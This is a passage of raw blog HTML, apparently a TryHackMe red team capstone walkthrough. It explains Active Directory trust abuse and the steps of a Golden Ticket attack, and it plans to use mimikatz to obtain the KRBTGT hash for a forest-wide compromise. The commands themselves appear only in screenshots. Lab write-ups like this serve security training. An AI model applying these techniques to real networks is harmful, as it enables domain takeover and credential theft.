data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?fit=1344%2C763&amp;ssl=1\" data-orig-size=\"1344,763\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240208200550\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?fit=1024%2C581&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?resize=1024%2C581&#038;ssl=1\" alt=\"\" class=\"wp-image-511\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?resize=1024%2C581&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?resize=300%2C170&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?resize=768%2C436&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240208200550.png?w=1344&amp;ssl=1 1344w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911961d&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911961d\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"556\" data-attachment-id=\"512\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207091754\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?fit=1410%2C766&amp;ssl=1\" data-orig-size=\"1410,766\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207091754\" data-image-description=\"\" 
data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?fit=1024%2C556&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?resize=1024%2C556&#038;ssl=1\" alt=\"\" class=\"wp-image-512\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?resize=1024%2C556&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?resize=300%2C163&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?resize=768%2C417&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091754.png?w=1410&amp;ssl=1 1410w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div 
style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can download the file now and start enumerating the domains.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09119ae3&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09119ae3\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"388\" data-attachment-id=\"513\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207091949\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?fit=1227%2C465&amp;ssl=1\" data-orig-size=\"1227,465\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207091949\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?fit=1024%2C388&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?resize=1024%2C388&#038;ssl=1\" 
alt=\"\" class=\"wp-image-513\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?resize=1024%2C388&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?resize=300%2C114&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?resize=768%2C291&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207091949.png?w=1227&amp;ssl=1 1227w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can see that there is a <code>Bidirectional<\/code> domain trust between the two domains.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911a02d&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911a02d\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"555\" data-attachment-id=\"515\" 
data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207092538-1\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?fit=1365%2C740&amp;ssl=1\" data-orig-size=\"1365,740\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207092538-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?fit=1024%2C555&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?resize=1024%2C555&#038;ssl=1\" alt=\"\" class=\"wp-image-515\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?resize=1024%2C555&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?resize=300%2C163&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?resize=768%2C416&amp;ssl=1 768w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207092538-1.png?w=1365&amp;ssl=1 1365w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Bidirectional domain trusts allow two Active Directory domains to trust each other, meaning users and resources from one domain can access resources in the other domain, and vice versa. Here are some common ways attackers abuse bidirectional domain trusts:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Pass-the-Ticket (PtT) Attacks<\/strong>: With access to one domain, attackers can use PtT attacks to obtain Ticket Granting Tickets (TGTs) for users in the trusted domain. These TGTs can then be used to authenticate to resources in the trusted domain, allowing the attacker to move laterally.<\/li>\n\n\n\n<li><strong>Pass-the-Hash (PtH) Attacks<\/strong>: Similar to PtT attacks, PtH attacks involve stealing password hashes of privileged accounts in one domain and using them to authenticate to resources in the trusted domain. 
This allows attackers to move laterally without needing to know the plaintext passwords.<\/li>\n\n\n\n<li><strong>Golden Ticket Attacks<\/strong>: Attackers can forge Kerberos tickets, known as Golden Tickets, using the KRBTGT account&#8217;s password hash from one domain and the trust relationship between the domains. With a Golden Ticket, attackers gain unrestricted access to any resource in the trusted domain.<\/li>\n\n\n\n<li><strong>Silver Ticket Attacks<\/strong>: Silver Ticket attacks involve forging Service Principal Name (SPN) tickets to impersonate specific services in the trusted domain. This allows attackers to access resources associated with those SPNs without needing the service account&#8217;s credentials.<\/li>\n\n\n\n<li><strong>Abusing AdminSDHolder<\/strong>: If the domains have differing security postures or if the trust is not properly configured, attackers may abuse AdminSDHolder, a mechanism in Active Directory that enforces permissions on sensitive accounts like Domain Admins. By escalating privileges or modifying permissions through AdminSDHolder, attackers can gain unauthorized access to critical accounts and resources in the trusted domain.<\/li>\n\n\n\n<li><strong>Exploiting Misconfigurations<\/strong>: Attackers may look for misconfigurations in the trust relationship, such as weak authentication settings or improper trust permissions. 
Exploiting these misconfigurations can provide avenues for unauthorized access and lateral movement.<\/li>\n<\/ol>\n\n\n\n<p>We can go for the <code>Golden Ticket<\/code> attack and try to impersonate a user (Administrator) with high privileges on the ROOTDC.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"32-golden-ticket-attack-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Golden Ticket Attack<\/mark><\/h3>\n\n\n\n<p>A Golden Ticket attack is a sophisticated form of cyber attack that involves forging Kerberos tickets to gain unauthorized access to a Windows Active Directory environment. In Kerberos authentication, tickets are used to prove the identity of users and services within the domain. The Ticket Granting Ticket (TGT) is a crucial component in this process, as it grants access to various resources across the domain.<\/p>\n\n\n\n<p>In a Golden Ticket attack, the attacker gains access to the password hash of the KRBTGT account, a privileged account used by the Key Distribution Center (KDC) to encrypt TGTs. With the KRBTGT password hash, the attacker can create a forged TGT that grants them unrestricted access to any resource in the Active Directory domain.<\/p>\n\n\n\n<p><strong>The key steps involved in a Golden Ticket attack include:<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Obtaining KRBTGT Password Hash<\/strong>: Attackers typically gain access to the KRBTGT password hash through various means, such as compromising a domain controller, using Mimikatz to extract the hash from memory, or exploiting vulnerabilities.<\/li>\n\n\n\n<li><strong>Forging the TGT<\/strong>: Using the KRBTGT password hash, the attacker generates a forged TGT with arbitrary user credentials, group memberships, and privileges. 
The attacker can set the ticket&#8217;s lifetime to a long duration, allowing prolonged access to the domain.<\/li>\n\n\n\n<li><strong>Injecting the TGT<\/strong>: The forged TGT is then injected into the attacker&#8217;s session, effectively impersonating a legitimate user with elevated privileges within the domain.<\/li>\n\n\n\n<li><strong>Accessing Resources<\/strong>: With the Golden Ticket in hand, the attacker can access any resource within the domain, including sensitive data, systems, and services. Since the forged TGT contains arbitrary user credentials, the attacker can bypass authentication checks and perform actions as if they were a legitimate user with full domain privileges.<\/li>\n<\/ol>\n\n\n\n<p>So to carry out this attack we will need:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The KRBTGT password hash<\/li>\n\n\n\n<li>The Security Identifier (SID) of the (CORPDC) Domain<\/li>\n\n\n\n<li>The user account we want to impersonate (Administrator)<\/li>\n<\/ul>\n\n\n\n<p>To make our attack more advanced, we can also inject the SID for the <code>Enterprise Admins<\/code> group so that the user we impersonate would have high privileges. 
This will give us access to all the machines in the entire Forest if we are successful in doing so.<\/p>\n\n\n\n<p>Let&#8217;s get the SIDs for the CORPDC and the Enterprise Admins group.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911ab19&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911ab19\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"301\" data-attachment-id=\"516\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210155035\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?fit=1046%2C307&amp;ssl=1\" data-orig-size=\"1046,307\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210155035\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?fit=1024%2C301&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" 
src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?resize=1024%2C301&#038;ssl=1\" alt=\"\" class=\"wp-image-516\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?resize=1024%2C301&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?resize=300%2C88&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?resize=768%2C225&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210155035.png?w=1046&amp;ssl=1 1046w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911b039&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911b039\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"226\" data-attachment-id=\"517\" 
data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207093325\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?fit=1313%2C290&amp;ssl=1\" data-orig-size=\"1313,290\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207093325\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?fit=1024%2C226&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?resize=1024%2C226&#038;ssl=1\" alt=\"\" class=\"wp-image-517\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?resize=1024%2C226&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?resize=300%2C66&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?resize=768%2C170&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207093325.png?w=1313&amp;ssl=1 1313w\" 
sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>To get the KRBTGT hash and also to forge the Golden Ticket, we will need <code>mimikatz.exe<\/code>. 
We will transfer the mimikatz binary the same way we got the PowerView on the CORPDC machine.<\/p>\n\n\n\n<p>Let&#8217;s get the KRBTGT hash first.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b0911b617&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b0911b617\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"668\" data-attachment-id=\"518\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240207200021\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?fit=1106%2C722&amp;ssl=1\" data-orig-size=\"1106,722\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240207200021\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240207200021.png?fit=1024%2C668&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" 